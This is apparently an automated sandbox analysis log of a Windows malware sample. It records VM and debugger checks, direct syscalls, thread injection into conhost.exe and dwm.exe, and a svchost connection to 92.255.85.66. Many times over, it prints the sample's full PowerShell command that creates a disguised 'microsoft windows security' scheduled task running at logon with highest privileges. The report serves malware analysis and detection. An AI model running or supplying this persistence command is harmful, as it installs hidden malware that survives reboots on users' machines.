Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\tu
Source: svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CBA000.00000004.00000020.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.000000000062E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504556387.000000000068E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.1704560662.0000000002C12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: svchost.exe, 0000000A.00000002.1704611548.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSAFD RfComm [Bluetooth]Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	API call chain: ExitProcess graph end node	graph_4-4366
Source: C:\Users\user\AppData\Local\Temp\896429707.exe	API call chain: ExitProcess graph end node	graph_4-4356
Source: C:\Windows\sysnldcvmr.exe	API call chain: ExitProcess graph end node	graph_5-4391
Source: C:\Windows\sysnldcvmr.exe	API call chain: ExitProcess graph end node	graph_5-4358
Source: C:\Windows\sysnldcvmr.exe	API call chain: ExitProcess graph end node	graph_5-4366
Source: C:\Windows\sysnldcvmr.exe	API call chain: ExitProcess graph end node	graph_7-4390
Source: C:\Windows\sysnldcvmr.exe	API call chain: ExitProcess graph end node	graph_7-4366

Source: C:\Users\user\AppData\Local\Temp\2779421088.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\2910625892.exe

Code function: 24_2_009E1840 LdrInitializeThunk,

24_2_009E1840

Source: C:\Users\user\AppData\Local\Temp\34D7.exe

Code function: 3_2_00251B28 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

3_2_00251B28

Source: C:\Users\user\AppData\Local\Temp\2910625892.exe

24_2_009EAAAC

Source: C:\Users\user\Desktop\f5TWdT5EAc.exe	Code function: 0_2_04A3CCC0 mov eax, dword ptr fs:[00000030h]	0_2_04A3CCC0
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_3_00F79277 mov eax, dword ptr fs:[00000030h]	9_3_00F79277
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F79277 mov eax, dword ptr fs:[00000030h]	9_2_00F79277
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_3_02740283 mov eax, dword ptr fs:[00000030h]	10_3_02740283

Source: C:\Users\user\AppData\Local\Temp\896429707.exe

Code function: 4_2_00409EE0 GetProcessHeaps,

4_2_00409EE0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\34D7.exe	Code function: 3_2_00251B28 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_00251B28
Source: C:\Users\user\AppData\Local\Temp\1171111125.exe	Code function: 8_2_00551AF8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	8_2_00551AF8
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F6CB32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00F6CB32
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F6CCC5 SetUnhandledExceptionFilter,	9_2_00F6CCC5
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F71508 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00F71508
Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Code function: 9_2_00F6CFC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00F6CFC3
Source: C:\Users\user\AppData\Local\Temp\78476062.exe	Code function: 11_2_007C1C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	11_2_007C1C08
Source: C:\Users\user\AppData\Local\Temp\640832494.exe	Code function: 13_2_001D27B8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	13_2_001D27B8
Source: C:\Users\user\AppData\Local\Temp\1657630034.exe	Code function: 19_2_00391898 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	19_2_00391898
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E78E7 SetUnhandledExceptionFilter,	24_2_009E78E7
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E4C71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_009E4C71
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E5E8F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_009E5E8F
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: 24_2_009E961A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	24_2_009E961A
Source: C:\Windows\System32\conhost.exe	Code function: 32_2_00007FF6CE1F1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	32_2_00007FF6CE1F1180

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 92.255.85.66 5188

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	NtQuerySystemInformation: Direct from: 0x7FF6D3C35B0E
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	NtQuerySystemInformation: Direct from: 0x7FF731CD5B0E
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	NtQuerySystemInformation: Direct from: 0x7FF7A1EF5B0E

Maps a DLL or memory area into another process

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Section loaded: NULL target: C:\Windows\System32\dwm.exe protection: readonly

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Thread register set: target process: 4828
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Thread register set: target process: 3728

Writes to foreign memory regions

Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Memory written: C:\Windows\System32\conhost.exe base: 736FF96010
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Memory written: C:\Windows\System32\dwm.exe base: 424A78010

Source: C:\Users\user\AppData\Local\Temp\2779421088.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Users\user\AppData\Local\Temp\2688734187.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }

Source: C:\Users\user\AppData\Local\Temp\2779421088.exe

Code function: 9_2_00F6CDD5 cpuid

9_2_00F6CDD5

Source: C:\Users\user\AppData\Local\Temp\896429707.exe	Code function: GetLocaleInfoA,strcmp,	4_2_0040E730
Source: C:\Windows\sysnldcvmr.exe	Code function: GetLocaleInfoA,strcmp,	5_2_0040E730
Source: C:\Windows\sysnldcvmr.exe	Code function: GetLocaleInfoA,strcmp,	7_2_0040E730
Source: C:\Users\user\AppData\Local\Temp\2910625892.exe	Code function: GetLocaleInfoA,	24_2_009EB022

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
